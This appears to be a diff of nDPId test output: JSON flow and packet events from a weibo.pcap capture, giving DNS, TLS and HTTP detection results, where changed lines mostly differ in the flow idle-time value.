+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1463089073635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073635,"pkt":"kDVu60UQeJKcD6iOCABFAAAoPQ1AAEAGynPAqAFpL1lB5caLAbuG5TcYPGq4OFAQAOUAuQAA"} +00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1463089073759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073759,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xo+u1rhnnywRAoASOQgi\/AAAAgQFqAEBBAIBAwMJ"} 
+00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1463089073759,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073759,"pkt":"kDVu60UQeJKcD6iOCABFAAAoGylAAEAG7FfAqAFpL1lB5caPAbufLBECrta4aFAQAOWb5wAA"} 00591{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1463089073760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"thread_ts_msec":1463089073760,"pkt":"eJKcD6iOkDVu60UQCABFAACPAABAAEARtqPAqAEBwKgBaQA1xdAAe7w5O9aBgAABAAMAAAAABmFjanN0YgZhbGl5dW4DY29tAAABAAHADAAFAAEAAAJYAAcEYWNqc8ATwC8ABQABAAABAAAhBGFjanMGYWxpeXVuA2NvbQNnZHMKYWxpYmFiYWRuc8AawEIAAQABAAAAbAAEKpy4Ew=="} 00915{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"42.156.184.19"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8np1AAEAG913AqAFpKpy4E8wvAbt9EpT8AAAAAKACchBGkwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8jjVAAEAGB8bAqAFpKpy4E8wwAbsmFYRUAAAAAKACchCuNwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8np1AAEAG913AqAFpKpy4E8wvAbt9EpT8AAAAAKACchBGkwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8jjVAAEAGB8bAqAFpKpy4E8wwAbsmFYRUAAAAAKACchCuNwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="} 00603{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1463089073763,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1463089073763,"pkt":"eJKcD6iOkDVu60UQCABFAACYAABAAEARtprAqAEBwKgBaQA1hB4AhOXUkPeBgAABAAMAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAcAMAAUAAQAAASwADAl3YWdicmlkZ2XAEsAuAAUAAQAAAMgAJgl3YWdicmlkZ2UGdGFvYmFvA2NvbQNnZHMKYWxpYmFiYWRuc8AZwEYAAQABAAAALwAEjM2qPw=="} 
00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1463089073763,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.170.63"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073764,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073764,"pkt":"kDVu60UQeJKcD6iOCABFAAA8woBAAEAGfx3AqAFpjM2qP7ppAbuaKMjiAAAAAKACchCy\/gAAAgQFtAQCCAoAQQpiAAAAAAEDAwc="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073773,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGjQneSRxgwKgBaQBQpSMt08jatYdf34ASOQjHwAAAAgQFqAEBBAIBAwMI"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073773,"pkt":"kDVu60UQeJKcD6iOCABFAAAoVdlAAEAGKDzAqAFp3kkcYKUjAFC1h1\/fLdPI21AQAOVAqwAA"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073788,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073788,"pkt":"kDVu60UQeJKcD6iOCABFAAA8M4FAAEAGYnrAqAFpKpy4E8wyAbubxznpAAAAAKACchCC5wAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073789,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073789,"pkt":"kDVu60UQeJKcD6iOCABFAAA8F+ZAAEAGKbjAqAFpjM2qP7prAbvY7h2OAAAAAKACchAfhQAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} -00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073764,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1463089073764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073764,"pkt":"kDVu60UQeJKcD6iOCABFAAA8woBAAEAGfx3AqAFpjM2qP7ppAbuaKMjiAAAAAKACchCy\/gAAAgQFtAQCCAoAQQpiAAAAAAEDAwc="} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1463089073773,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGjQneSRxgwKgBaQBQpSMt08jatYdf34ASOQjHwAAAAgQFqAEBBAIBAwMI"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1463089073773,"pkt":"kDVu60UQeJKcD6iOCABFAAAoVdlAAEAGKDzAqAFp3kkcYKUjAFC1h1\/fLdPI21AQAOVAqwAA"} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073788,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1463089073788,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073788,"pkt":"kDVu60UQeJKcD6iOCABFAAA8M4FAAEAGYnrAqAFpKpy4E8wyAbubxznpAAAAAKACchCC5wAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073789,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1463089073789,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1463089073789,"pkt":"kDVu60UQeJKcD6iOCABFAAA8F+ZAAEAGKbjAqAFpjM2qP7prAbvY7h2OAAAAAKACchAfhQAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="} +00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}} 00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 